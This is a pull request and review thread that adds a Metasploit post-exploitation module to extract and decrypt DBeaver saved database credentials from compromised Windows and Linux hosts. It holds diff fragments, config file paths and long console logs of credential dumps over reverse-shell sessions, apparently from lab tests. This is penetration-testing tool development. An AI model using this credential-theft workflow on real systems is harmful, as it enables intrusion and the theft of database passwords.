### PR TITLE
Gather Dbeaver Password

### PR DESCRIPTION
**Pull request by cn-kali-team**
## Vulnerable Application

  Any Windows host with a `meterpreter` session and Dbeaver full version
  installed. The following passwords will be searched for and recovered:

### Installation Steps

  1. Download the latest installer of Dbeaver (https://dbeaver.io/files/6.1.0/) and latest version.
  2. Select default installation
  3. Open the software and create a database connection
     complete password setting, add the test account password to the certificate.

## Verification Steps

  1. Get a `meterpreter` session on a Windows host.
  2. Do: ```run post/windows/gather/credentials/dbeaver```
  3. If the system has registry keys for Dbeaver passwords they will be printed out.

## Options

 **XML_FILE_PATH**

- Specify an XML configuration file.
- eg. `C:\Users\FireEye\.dbeaver4\General\.dbeaver-data-sources.xml` or 
      `C:\Users\FireEye\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver-data-sources.xml`

 **JSON_DIR_PATH**

- Specifies the config dir path for Dbeaver.
- Ensure that there are two files `credentials-config.json` and `data-sources.json` under the directory
- eg. `"C:\Users\FireEye\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver`

## Scenarios

```
meterpreter > run post/windows/gather/credentials/dbeaver

[*] Gather Dbeaver Passwords on FireEye
[+] dbeaver .dbeaver-data-sources.xml saved to /home/kali-team/.msf4/loot/20221205145256_default_172.16.153.128_dbeaver.creds_319751.txt
[*] Finished processing C:\Users\FireEye\.dbeaver4\General\.dbeaver-data-sources.xml
[+] dbeaver credentials-config.json saved to /home/kali-team/.msf4/loot/20221205145256_default_172.16.153.128_dbeaver.creds_334807.txt
[+] dbeaver data-sources.json saved to /home/kali-team/.msf4/loot/20221205145256_default_172.16.153.128_dbeaver.creds_309767.txt
[*] Finished processing C:\Users\FireEye\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver
[+] Passwords stored in: /home/kali-team/.msf4/loot/20221205145256_default_172.16.153.128_host.dbeaver_421133.txt
[+] Dbeaver Password
================

Name             Protocol    Hostname   Port  Username  Password        DB        URI                                        Type
----             --------    --------   ----  --------  --------        --        ---                                        ----
Test_MYSQL       mysql       localhost  3306  root      test_password   db        jdbc:mysql://localhost:3306/db             dev
Test_PostgreSQL  postgresql  localhost  5432  postgres  test_passwordr  postgres  jdbc:postgresql://localhost:5432/postgres  dev
localhost        mysql       localhost  3306  root      test_mysql      db        jdbc:mysql://localhost:3306/db             test
postgres         postgresql  localhost  5432  postgres  test_postgres   postgres  jdbc:postgresql://localhost:5432/postgres  prod

meterpreter > 
```

### CODE REVIEW

File: modules/post/windows/gather/credentials/dbeaver.rb [hunk 1]
```diff
@@ -0,0 +1,145 @@
...
+          dump all saved session information from the target. The passwords for these saved sessions will then be decrypted
+          where possible.
+        },
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'URL', 'https://blog.kali-team.cn/Metasploit-dbeaver-9f42e26241c94ba785dce5f1e69697aa' ]
+        ],
+        'Author' => ['Kali-Team <kali-team[at]qq.com>'],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter' ],
```
Comment (bwatters-r7) [inline modules/post/windows/gather/credentials/dbeaver.rb:31]: How hard would it be to make this work with shell session, too?

File: modules/post/windows/gather/credentials/dbeaver.rb [hunk 2]
```diff
@@ -0,0 +1,145 @@
...
+    all_result = []
+    xml_path = ''
+    json_path = ''
+    if datastore['XML_FILE_PATH'].present?
+      xml_path = datastore['XML_FILE_PATH']
+      print_status("Looking for #{xml_path}")
+      all_result += parse_xml_file(xml_path)
+    end
+    if datastore['JSON_DIR_PATH'].present?
+      json_path = datastore['JSON_DIR_PATH']
```
Comment (cdelafuente-r7) [inline modules/post/windows/gather/credentials/dbeaver.rb:130]: I think the same status message should also be added here. It helps to understand what's going on, specially when the provided paths are wrong.
```suggestion
      json_path = datastore['JSON_DIR_PATH']
      print_status("Looking for JSON files in #{json_path}")
```

**Review by cdelafuente-r7 — CHANGES_REQUESTED** [review]
Thanks for this contribution @cn-kali-team ! I left a few comments and suggestions for you to review when you get a chance.

I tested against Dbeaver version 22.3.1 on Windows 11 and got an error:
```
msf6 post(windows/gather/credentials/dbeaver) > run verbose=true session=1

[*] Gather Dbeaver Passwords on n00tmeg
[+] dbeaver credentials-config.json saved to /home/msfuser/.msf4/loot/20230104195845_default_192.168.144.181_dbeaver.creds_817936.txt
[+] dbeaver data-sources.json saved to /home/msfuser/.msf4/loot/20230104195845_default_192.168.144.181_dbeaver.creds_306731.txt
[-] Post failed: NoMethodError undefined method `[]' for nil:NilClass
[-] Call stack:
[-]   /home/msfuser/dev/src/metasploit-framework/lib/rex/parser/dbeaver.rb:56:in `block in parse_data_sources'
[-]   /home/msfuser/dev/src/metasploit-framework/lib/rex/parser/dbeaver.rb:50:in `each'
[-]   /home/msfuser/dev/src/metasploit-framework/lib/rex/parser/dbeaver.rb:50:in `parse_data_sources'
[-]   /home/msfuser/dev/src/metasploit-framework/modules/post/windows/gather/credentials/dbeaver.rb:93:in `parse_json_dir'
[-]   /home/msfuser/dev/src/metasploit-framework/modules/post/windows/gather/credentials/dbeaver.rb:140:in `block in run'
[-]   /home/msfuser/dev/src/metasploit-framework/modules/post/windows/gather/credentials/dbeaver.rb:134:in `each'
[-]   /home/msfuser/dev/src/metasploit-framework/modules/post/windows/gather/credentials/dbeaver.rb:134:in `run'
[*] Post module execution completed
```
I installed a couple of connections in Dbeaver, but I believe this error is related to the sample SQLite database that comes with the default installation. This connection has no password and it is likely breaking when the module tries to parse the JSON files. As I suggested in my comments below, I believe the parsing library should be updated to be more robust and avoid breaking the module execution when an error occurs.

**Comment by cn-kali-team** [comment]
Whether this module is also modified to support multiple platforms?

**Comment by cdelafuente-r7** [comment]
Yes, that would great, if possible. Thanks!

Also, it looks like there are still some comments that need to be addressed. Please, let me know if you have any questions.

**Comment by cdelafuente-r7** [comment]
Thanks @cn-kali-team ! I realize I was not very clear on my exception handling suggestions. To ease the process, I submitted a PR to your branch with the correct fixes: https://github.com/cn-kali-team/metasploit-framework/pull/1

Please, let me know what you think and feel free to merge this PR if you agree with these changes.

**Comment by cdelafuente-r7** [comment]
Thanks @cn-kali-team for merging this PR. Everything looks good to me now. I tested against versions 6.1.3 and 22.3.1 installed on Windows 11 and Ubuntu 20.04.4. Note that I couldn't test the old version 6.1.3 on Ubuntu 20.04.4 due to dependency issues. I'll go ahead and land it.

Thanks for this contribution!

- Example output
<details>
<summary>Dbeaver 6.1.3 on Windows 11</summary>

```
msf6 payload(cmd/windows/powershell_reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                                      Connection
  --  ----  ----                     -----------                                                                      ----------
  1         meterpreter x64/windows  DESKTOP-26CQRHP\n00tmeg @ DESKTOP-26CQRHP                                        192.168.100.1:4444 -> 192.168.100.108:50401 (192.168.100.108)
  2         shell cmd/windows        Shell Banner: Microsoft Windows [Version 10.0.22000.856] (c) Microsoft Corpo...  192.168.100.1:4444 -> 192.168.100.108:50404 (192.168.100.108)
  3         powershell windows       n00tmeg @ DESKTOP-26CQRHP                                                        192.168.100.1:4444 -> 192.168.100.108:50405 (192.168.100.108)

msf6 payload(cmd/windows/powershell_reverse_tcp) > use multi/gather/dbeaver
msf6 post(multi/gather/dbeaver) > run verbose=true session=1

[*] Gather Dbeaver Passwords
[+] dbeaver .dbeaver-data-sources.xml saved to /home/msfuser/.msf4/loot/20230112154538_default_192.168.100.108_dbeaver.creds_157778.txt
[*] Finished processing C:\Users\n00tmeg\.dbeaver4\General\.dbeaver-data-sources.xml
[+] Passwords stored in: /home/msfuser/.msf4/loot/20230112154538_default_192.168.100.108_host.dbeaver_697035.txt
[+] Dbeaver Password
================

Name                   Protocol    Hostname   Port  Username  Password      DB        URI                                        Type
----                   --------    --------   ----  --------  --------      --        ---                                        ----
Oracle - foo           oracle      localhost  1521  admin     P@ssw0rd!!!!  foo       jdbc:oracle:thin:@//localhost:1521/foo     dev
PostgreSQL - postgres  postgresql  localhost  5432  postgres  mypass123$$$  postgres  jdbc:postgresql://localhost:5432/postgres  dev

[*] Post module execution completed
msf6 post(multi/gather/dbeaver) > run verbose=true session=2

[*] Gather Dbeaver Passwords
[+] dbeaver .dbeaver-data-sources.xml saved to /home/msfuser/.msf4/loot/20230112154542_default_192.168.100.108_dbeaver.creds_339648.txt
[*] Finished processing C:\Users\n00tmeg\.dbeaver4\General\.dbeaver-data-sources.xml
[+] Passwords stored in: /home/msfuser/.msf4/loot/20230112154542_default_192.168.100.108_host.dbeaver_794551.txt
[+] Dbeaver Password
================

Name                   Protocol    Hostname   Port  Username  Password      DB        URI                                        Type
----                   --------    --------   ----  --------  --------      --        ---                                        ----
Oracle - foo           oracle      localhost  1521  admin     P@ssw0rd!!!!  foo       jdbc:oracle:thin:@//localhost:1521/foo     dev
PostgreSQL - postgres  postgresql  localhost  5432  postgres  mypass123$$$  postgres  jdbc:postgresql://localhost:5432/postgres  dev

[*] Post module execution completed
msf6 post(multi/gather/dbeaver) > run verbose=true session=3

[*] Gather Dbeaver Passwords
[+] dbeaver .dbeaver-data-sources.xml saved to /home/msfuser/.msf4/loot/20230112154545_default_192.168.100.108_dbeaver.creds_000327.txt
[*] Finished processing C:\Users\n00tmeg\.dbeaver4\General\.dbeaver-data-sources.xml
[+] Passwords stored in: /home/msfuser/.msf4/loot/20230112154545_default_192.168.100.108_host.dbeaver_033904.txt
[+] Dbeaver Password
================

Name                   Protocol    Hostname   Port  Username  Password      DB        URI                                        Type
----                   --------    --------   ----  --------  --------      --        ---                                        ----
Oracle - foo           oracle      localhost  1521  admin     P@ssw0rd!!!!  foo       jdbc:oracle:thin:@//localhost:1521/foo     dev
PostgreSQL - postgres  postgresql  localhost  5432  postgres  mypass123$$$  postgres  jdbc:postgresql://localhost:5432/postgres  dev

[*] Post module execution completed
msf6 post(multi/gather/dbeaver) > creds
Credentials
===========

host  origin           service  public    private       realm  private_type  JtR Format
----  ------           -------  ------    -------       -----  ------------  ----------
      192.168.100.108           admin     P@ssw0rd!!!!         Password
      192.168.100.108           postgres  mypass123$$$         Password

msf6 post(multi/gather/dbeaver) > loot

Loot
====

host             service  type           name                                                          content     info              path
----             -------  ----           ----                                                          -------     ----              ----
192.168.100.108           dbeaver.creds  C:\Users\n00tmeg\.dbeaver4\General\.dbeaver-data-sources.xml  text/xml                      /home/msfuser/.msf4/loot/20230112154538_default_192.168.100.108_dbeaver.creds_157778.txt
192.168.100.108           host.dbeaver   dbeaver.txt                                                   text/plain  Dbeaver Password  /home/msfuser/.msf4/loot/20230112154538_default_192.168.100.108_host.dbeaver_697035.txt
192.168.100.108           dbeaver.creds  C:\Users\n00tmeg\.dbeaver4\General\.dbeaver-data-sources.xml  text/xml                      /home/msfuser/.msf4/loot/20230112154542_default_192.168.100.108_dbeaver.creds_339648.txt
192.168.100.108           host.dbeaver   dbeaver.txt                                                   text/plain  Dbeaver Password  /home/msfuser/.msf4/loot/20230112154542_default_192.168.100.108_host.dbeaver_794551.txt
192.168.100.108           dbeaver.creds  C:\Users\n00tmeg\.dbeaver4\General\.dbeaver-data-sources.xml  text/xml                      /home/msfuser/.msf4/loot/20230112154545_default_192.168.100.108_dbeaver.creds_000327.txt
192.168.100.108           host.dbeaver   dbeaver.txt                                                   text/plain  Dbeaver Password  /home/msfuser/.msf4/loot/20230112154545_default_192.168.100.108_host.dbeaver_033904.txt
```

</details>

<details>
<summary>Dbeaver 22.3.1 on Windows 11</summary>

```
msf6 payload(cmd/windows/powershell_reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                     Connection
  --  ----  ----                     -----------                                                     ----------
  1         meterpreter x64/windows  DESKTOP-26CQRHP\n00tmeg @ DESKTOP-26CQRHP                       192.168.100.1:4444 -> 192.168.100.108:50002 (192.168.100.108)
  2         shell cmd/windows        Shell Banner: Microsoft Windows [Version 10.0.22000.856] -----  192.168.100.1:4444 -> 192.168.100.108:50005 (192.168.100.108)
  3         powershell windows       n00tmeg @ DESKTOP-26CQRHP                                       192.168.100.1:4444 -> 192.168.100.108:50007 (192.168.100.108)

msf6 payload(cmd/windows/powershell_reverse_tcp) > use multi/gather/dbeaver
msf6 post(multi/gather/dbeaver) > run verbose=true session=1

[*] Gather Dbeaver Passwords
[+] dbeaver credentials-config.json saved to /home/msfuser/.msf4/loot/20230112155413_default_192.168.100.108_dbeaver.creds_580019.txt
[+] dbeaver data-sources.json saved to /home/msfuser/.msf4/loot/20230112155413_default_192.168.100.108_dbeaver.creds_881927.txt
[*] Finished processing C:\Users\n00tmeg\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver
[+] Passwords stored in: /home/msfuser/.msf4/loot/20230112155413_default_192.168.100.108_host.dbeaver_241245.txt
[+] Dbeaver Password
================

Name                              Protocol  Hostname   Port  Username  Password          DB                                                                                                     URI                                                                       Type
----                              --------  --------   ----  --------  --------          --                                                                                                     ---                                                                       ----
DBeaver Sample Database (SQLite)  sqlite                                                 C:\Users\n00tmeg\AppData\Roaming\DBeaverData\workspace6\.metadata\sample-database-sqlite-1\Chinook.db  jdbc:sqlite:C:\Users\n00tmeg\AppData\Roaming\DBeaverData\workspace6\.met  dev
                                                                                                                                                                                                adata\sample-database-sqlite-1\Chinook.db
ORCL                              oracle    localhost  1521  system    Or4cle$$Pass!@12  ORCL                                                                                                   jdbc:oracle:thin:@//localhost:1521/ORCL                                   dev
localhost                         mysql     localhost  3306  root      P@ssw0rd!                                                                                                                jdbc:mariadb://localhost:3306/                                            dev

[*] Post module execution completed
msf6 post(multi/gather/dbeaver) > run verbose=true session=2

[*] Gather Dbeaver Passwords
[+] dbeaver credentials-config.json saved to /home/msfuser/.msf4/loot/20230112155415_default_192.168.100.108_dbeaver.creds_108940.txt
[+] dbeaver data-sources.json saved to /home/msfuser/.msf4/loot/20230112155415_default_192.168.100.108_dbeaver.creds_919290.txt
[*] Finished processing C:\Users\n00tmeg\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver
[+] Passwords stored in: /home/msfuser/.msf4/loot/20230112155415_default_192.168.100.108_host.dbeaver_598094.txt
[+] Dbeaver Password
================

Name                              Protocol  Hostname   Port  Username  Password          DB                                                                                                     URI                                                                       Type
----                              --------  --------   ----  --------  --------          --                                                                                                     ---                                                                       ----
DBeaver Sample Database (SQLite)  sqlite                                                 C:\Users\n00tmeg\AppData\Roaming\DBeaverData\workspace6\.metadata\sample-database-sqlite-1\Chinook.db  jdbc:sqlite:C:\Users\n00tmeg\AppData\Roaming\DBeaverData\workspace6\.met  dev
                                                                                                                                                                                                adata\sample-database-sqlite-1\Chinook.db
ORCL                              oracle    localhost  1521  system    Or4cle$$Pass!@12  ORCL                                                                                                   jdbc:oracle:thin:@//localhost:1521/ORCL                                   dev
localhost                         mysql     localhost  3306  root      P@ssw0rd!                                                                                                                jdbc:mariadb://localhost:3306/                                            dev

[*] Post module execution completed
msf6 post(multi/gather/dbeaver) > run verbose=true session=3

[*] Gather Dbeaver Passwords
[+] dbeaver credentials-config.json saved to /home/msfuser/.msf4/loot/20230112155418_default_192.168.100.108_dbeaver.creds_457980.txt
[+] dbeaver data-sources.json saved to /home/msfuser/.msf4/loot/20230112155418_default_192.168.100.108_dbeaver.creds_927378.txt
[*] Finished processing C:\Users\n00tmeg\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver
[+] Passwords stored in: /home/msfuser/.msf4/loot/20230112155418_default_192.168.100.108_host.dbeaver_440879.txt
[+] Dbeaver Password
================

Name                              Protocol  Hostname   Port  Username  Password          DB                                                                                                     URI                                                                       Type
----                              --------  --------   ----  --------  --------          --                                                                                                     ---                                                                       ----
DBeaver Sample Database (SQLite)  sqlite                                                 C:\Users\n00tmeg\AppData\Roaming\DBeaverData\workspace6\.metadata\sample-database-sqlite-1\Chinook.db  jdbc:sqlite:C:\Users\n00tmeg\AppData\Roaming\DBeaverData\workspace6\.met  dev
                                                                                                                                                                                                adata\sample-database-sqlite-1\Chinook.db
ORCL                              oracle    localhost  1521  system    Or4cle$$Pass!@12  ORCL                                                                                                   jdbc:oracle:thin:@//localhost:1521/ORCL                                   dev
localhost                         mysql     localhost  3306  root      P@ssw0rd!                                                                                                                jdbc:mariadb://localhost:3306/                                            dev

[*] Post module execution completed
msf6 post(multi/gather/dbeaver) > creds
Credentials
===========

host  origin           service  public  private           realm  private_type  JtR Format
----  ------           -------  ------  -------           -----  ------------  ----------
      192.168.100.108           root    P@ssw0rd!                Password
      192.168.100.108           system  Or4cle$$Pass!@12         Password

msf6 post(multi/gather/dbeaver) > loot

Loot
====

host             service  type           name                                                                                              content     info              path
----             -------  ----           ----                                                                                              -------     ----              ----
192.168.100.108           host.dbeaver   dbeaver.txt                                                                                       text/plain  Dbeaver Password  /home/msfuser/.msf4/loot/20230112155418_default_192.168.100.108_host.dbeaver_440879.txt
192.168.100.108           dbeaver.creds  C:\Users\n00tmeg\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver\data-sources.json        text/json                     /home/msfuser/.msf4/loot/20230112155413_default_192.168.100.108_dbeaver.creds_881927.txt
192.168.100.108           host.dbeaver   dbeaver.txt                                                                                       text/plain  Dbeaver Password  /home/msfuser/.msf4/loot/20230112155413_default_192.168.100.108_host.dbeaver_241245.txt
192.168.100.108           dbeaver.creds  C:\Users\n00tmeg\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver\credentials-config.json  text/json                     /home/msfuser/.msf4/loot/20230112155415_default_192.168.100.108_dbeaver.creds_108940.txt
192.168.100.108           dbeaver.creds  C:\Users\n00tmeg\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver\data-sources.json        text/json                     /home/msfuser/.msf4/loot/20230112155415_default_192.168.100.108_dbeaver.creds_919290.txt
192.168.100.108           host.dbeaver   dbeaver.txt                                                                                       text/plain  Dbeaver Password  /home/msfuser/.msf4/loot/20230112155415_default_192.168.100.108_host.dbeaver_598094.txt
192.168.100.108           dbeaver.creds  C:\Users\n00tmeg\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver\credentials-config.json  text/json                     /home/msfuser/.msf4/loot/20230112155418_default_192.168.100.108_dbeaver.creds_457980.txt
192.168.100.108           dbeaver.creds  C:\Users\n00tmeg\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver\data-sources.json        text/json                     /home/msfuser/.msf4/loot/20230112155418_default_192.168.100.108_dbeaver.creds_927378.txt
192.168.100.108           dbeaver.creds  C:\Users\n00tmeg\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver\credentials-config.json  text/json                     /home/msfuser/.msf4/loot/20230112155413_default_192.168.100.108_dbeaver.creds_580019.txt
```

</details>

<details>
<summary>Dbeaver 22.3.1 on Ubuntu 20.04.4</summary>

```
msf6 payload(cmd/unix/reverse_bash) > sessions

Active sessions
===============

  Id  Name  Type                   Information                Connection
  --  ----  ----                   -----------                ----------
  1         meterpreter x64/linux  n00tmeg @ 192.168.100.109  192.168.100.1:4444 -> 192.168.100.109:34716 (192.168.100.109)
  2         shell cmd/unix                                    192.168.100.1:4444 -> 192.168.100.109:51902 (192.168.100.109)

msf6 payload(cmd/unix/reverse_bash) > use multi/gather/dbeaver
msf6 post(multi/gather/dbeaver) > run verbose=true session=1

[*] Gather Dbeaver Passwords
[+] dbeaver credentials-config.json saved to /home/msfuser/.msf4/loot/20230112155949_default_192.168.100.109_dbeaver.creds_385995.txt
[+] dbeaver data-sources.json saved to /home/msfuser/.msf4/loot/20230112155949_default_192.168.100.109_dbeaver.creds_283276.txt
[*] Finished processing /home/n00tmeg/.local/share/DBeaverData/workspace6/General/.dbeaver
[+] Passwords stored in: /home/msfuser/.msf4/loot/20230112155949_default_192.168.100.109_host.dbeaver_155417.txt
[+] Dbeaver Password
================

Name                              Protocol   Hostname   Port  Username  Password        DB                                                                                               URI                                                                              Type
----                              --------   --------   ----  --------  --------        --                                                                                               ---                                                                              ----
DBeaver Sample Database (SQLite)  sqlite                                                /home/n00tmeg/.local/share/DBeaverData/workspace6/.metadata/sample-database-sqlite-1/Chinook.db  jdbc:sqlite:/home/n00tmeg/.local/share/DBeaverData/workspace6/.metadata/sample-  dev
                                                                                                                                                                                         database-sqlite-1/Chinook.db
ORCL                              oracle     localhost  1521  system    passw0rd!@#     ORCL                                                                                             jdbc:oracle:thin:@//localhost:1521/ORCL                                          dev
master                            sqlserver  localhost  1433  sa        p@ssw0rd!@####  master                                                                                           jdbc:sqlserver://;serverName=localhost;databaseName=master                       dev

[*] Post module execution completed
msf6 post(multi/gather/dbeaver) > run verbose=true session=2

[*] Gather Dbeaver Passwords
[+] dbeaver credentials-config.json saved to /home/msfuser/.msf4/loot/20230112155952_default_192.168.100.109_dbeaver.creds_384278.txt
[+] dbeaver data-sources.json saved to /home/msfuser/.msf4/loot/20230112155952_default_192.168.100.109_dbeaver.creds_841312.txt
[*] Finished processing /home/n00tmeg/.local/share/DBeaverData/workspace6/General/.dbeaver
[+] Passwords stored in: /home/msfuser/.msf4/loot/20230112155952_default_192.168.100.109_host.dbeaver_012275.txt
[+] Dbeaver Password
================

Name                              Protocol   Hostname   Port  Username  Password        DB                                                                                               URI                                                                              Type
----                              --------   --------   ----  --------  --------        --                                                                                               ---                                                                              ----
DBeaver Sample Database (SQLite)  sqlite                                                /home/n00tmeg/.local/share/DBeaverData/workspace6/.metadata/sample-database-sqlite-1/Chinook.db  jdbc:sqlite:/home/n00tmeg/.local/share/DBeaverData/workspace6/.metadata/sample-  dev
                                                                                                                                                                                         database-sqlite-1/Chinook.db
ORCL                              oracle     localhost  1521  system    passw0rd!@#     ORCL                                                                                             jdbc:oracle:thin:@//localhost:1521/ORCL                                          dev
master                            sqlserver  localhost  1433  sa        p@ssw0rd!@####  master                                                                                           jdbc:sqlserver://;serverName=localhost;databaseName=master                       dev

[*] Post module execution completed
msf6 post(multi/gather/dbeaver) > creds
Credentials
===========

host  origin           service  public  private         realm  private_type  JtR Format
----  ------           -------  ------  -------         -----  ------------  ----------
      192.168.100.109           system  passw0rd!@#            Password
      192.168.100.109           sa      p@ssw0rd!@####         Password

msf6 post(multi/gather/dbeaver) > loot

Loot
====

host             service  type           name                                                                                        content     info              path
----             -------  ----           ----                                                                                        -------     ----              ----
192.168.100.109           dbeaver.creds  /home/n00tmeg/.local/share/DBeaverData/workspace6/General/.dbeaver/credentials-config.json  text/json                     /home/msfuser/.msf4/loot/20230112155949_default_192.168.100.109_dbeaver.creds_385995.txt
192.168.100.109           dbeaver.creds  /home/n00tmeg/.local/share/DBeaverData/workspace6/General/.dbeaver/data-sources.json        text/json                     /home/msfuser/.msf4/loot/20230112155949_default_192.168.100.109_dbeaver.creds_283276.txt
192.168.100.109           host.dbeaver   dbeaver.txt                                                                                 text/plain  Dbeaver Password  /home/msfuser/.msf4/loot/20230112155949_default_192.168.100.109_host.dbeaver_155417.txt
192.168.100.109           dbeaver.creds  /home/n00tmeg/.local/share/DBeaverData/workspace6/General/.dbeaver/credentials-config.json  text/json                     /home/msfuser/.msf4/loot/20230112155952_default_192.168.100.109_dbeaver.creds_384278.txt
192.168.100.109           dbeaver.creds  /home/n00tmeg/.local/share/DBeaverData/workspace6/General/.dbeaver/data-sources.json        text/json                     /home/msfuser/.msf4/loot/20230112155952_default_192.168.100.109_dbeaver.creds_841312.txt
192.168.100.109           host.dbeaver   dbeaver.txt                                                                                 text/plain  Dbeaver Password  /home/msfuser/.msf4/loot/20230112155952_default_192.168.100.109_host.dbeaver_012275.txt
```

</details>

**Comment by cdelafuente-r7** [comment]
# Release Notes

This adds a post exploit module that retrieves Dbeaver session data from local configuration files. It is able to extract and decrypt credentials stored in these files for any version of Dbeaver installed on Windows or Linux/Unix systems.

**Comment by cn-kali-team** [comment]
Thank you for your work

**Pull request merged**